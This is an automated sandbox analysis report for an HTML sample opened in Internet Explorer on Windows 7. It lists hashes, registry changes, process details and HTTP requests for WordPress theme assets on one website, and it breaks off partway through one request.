Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
143s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
27/05/2024, 19:54 UTC
Static task
static1
Behavioral task
behavioral1
Sample
7a5374345893ba13875add636485c8c0_JaffaCakes118.html
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
7a5374345893ba13875add636485c8c0_JaffaCakes118.html
Resource
win10v2004-20240508-en
General
-
Target
7a5374345893ba13875add636485c8c0_JaffaCakes118.html
-
Size
71KB
-
MD5
7a5374345893ba13875add636485c8c0
-
SHA1
05f9a9afbb1fb92d5060f22c212edc0e6a5cda28
-
SHA256
c6ef2ac2311a5e75fd93996abb180d5339a82170add44433a5d610b9ea18682d
-
SHA512
db71b09aadf7ea2e7d856c8f65e1b0a675495013d10ff3f9e77c0edee2eabfb978a4d1268955202f1851bd5c6651d7ea4bfef5dd30a2f79685b90fb2003c177e
-
SSDEEP
1536:FO/DTeYWEtTfTnEYkDRjvhYkDR2ebM4jgm4sW+HutwTRKA4BOyyHwmc63okUnrW8:6eYWafTEYkDRjvhYkDR2ebM4jgm4sW+q
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423001551" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a230000000002000000000010660000000100002000000072436fb2e1fb460d72a9fec410997be49d312a47b5cf690f29f8cb2f6ae58025000000000e8000000002000020000000661b3763ed801871a64415270ef045b7593a08c77d12f2e3797fa41f299521e090000000f579904ea5b616f93e24b2d6ec67cabffd67ee6c111cb14e3fb8ebecab2a866ed0e71962e2f14d87dbaf5f0ff14a8af98349ecfb995e07da60b73df3eca437a07673f50f2ba0f2f93b4ea7a26954771aa105ee1526af2142273f5d8de0cc113a71226a671d5a33052de97c26a12801f5e7ef93a5b8da460d3b9d89fc6d21d29feda4e11c72fd1ad8886992e0ff39a71540000000c483c199d79749b1cb0d1976f716aa44022b5e01638aadb7c432bce728efecf94b9513a3a76ea3576f38a77280fcfa372e74014f6d4abd3e4e3db3bd7daefea1 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a23000000000200000000001066000000010000200000009416e991ba5673f4c148e8d2333fa996a3d55d92c968607412e408c76df5ecae000000000e800000000200002000000045732ca5c87edea1ec848e9c71694df17d6143af9c7ce710c17e378f524d054c200000008921fe82e7295962e539c929a4d4ef85b645757a3c8f722b45c282dabe546cff4000000089274e6c53128464da343bcf90a1c6e4f74165b02fe1d852365f2c636ae9fce6a7ba9c69db47ba6bf686f1063abc72fa4a802ecd47c6caf6c8dcc07baf343079 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F625BDC1-1C62-11EF-8E9F-FAB46556C0ED} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c022bbce6fb0da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2980 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2980 iexplore.exe 2980 iexplore.exe 1284 IEXPLORE.EXE 1284 IEXPLORE.EXE 1284 IEXPLORE.EXE 1284 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2980 wrote to memory of 1284 2980 iexplore.exe 28 PID 2980 wrote to memory of 1284 2980 iexplore.exe 28 PID 2980 wrote to memory of 1284 2980 iexplore.exe 28 PID 2980 wrote to memory of 1284 2980 iexplore.exe 28
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\7a5374345893ba13875add636485c8c0_JaffaCakes118.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2980 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1284
-
Network
-
Remote address:8.8.8.8:53Requestajax.googleapis.comIN AResponseajax.googleapis.comIN A216.58.214.74
-
Remote address:8.8.8.8:53Requestanatomiteca.comIN AResponseanatomiteca.comIN A13.248.169.48anatomiteca.comIN A76.223.54.146
-
Remote address:216.58.214.74:443RequestGET /ajax/libs/webfont/1.5.3/webfont.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ajax.googleapis.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="hosted-libraries-pushers"
Report-To: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
Timing-Allow-Origin: *
Content-Length: 6791
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sun, 26 May 2024 21:11:07 GMT
Expires: Mon, 26 May 2025 21:11:07 GMT
Cache-Control: public, max-age=31536000, stale-while-revalidate=2592000
Age: 81818
Last-Modified: Tue, 03 Mar 2020 19:15:00 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttp://anatomiteca.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.0.6IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.0.6 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/easyzoom.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/offcanvas.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/inc/fonts/getbowtied-fonts/style.css?ver=1.0IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/inc/fonts/getbowtied-fonts/style.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.0.6IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.0.6 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.nanoscroller.min.js?ver=0.7.6IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/jquery.nanoscroller.min.js?ver=0.7.6 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.snapscroll.min.js?ver=1.6.1IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/jquery.snapscroll.min.js?ver=1.6.1 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/js/idangerous.swiper.min.js?ver=2.6.1IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/idangerous.swiper.min.js?ver=2.6.1 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-includes/js/wp-emoji-release.min.js?ver=4.2.15 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 125
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/owl.theme.css?ver=1.3.1 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-includes/js/jquery/jquery.js?ver=1.11.2 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 125
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.3IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.3 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/fresco.js?ver=1.3.0 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.stellar.min.js?ver=0.6.2IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/jquery.stellar.min.js?ver=0.6.2 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/jquery.fitvids.js?ver=1.0.3 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/animate.min.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/fresco/fresco.css?ver=1.3.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/styles.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/inc/fonts/font-awesome/css/font-awesome.min.css?ver=1.0IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/inc/fonts/font-awesome/css/font-awesome.min.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/modernizr.custom.js?ver=2.6.3 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/js/foundation.interchange.js?ver=5.2.0IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/foundation.interchange.js?ver=5.2.0 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/jquery.scroll_to.js?ver=1.4.5 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.touchSwipe.min.js?ver=1.6.5IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/jquery.touchSwipe.min.js?ver=1.6.5 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/css/animations-products-grid.css?ver=1.0IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/animations-products-grid.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/css/woocommerce-overwrite.css?ver=1.0IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/woocommerce-overwrite.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/responsive.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/style.css?ver=4.2.15 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 125
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=4.7IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=4.7 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/foundation.min.js?ver=5.2.0 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/easyzoom.js?ver=1.0 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/images/error_404.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
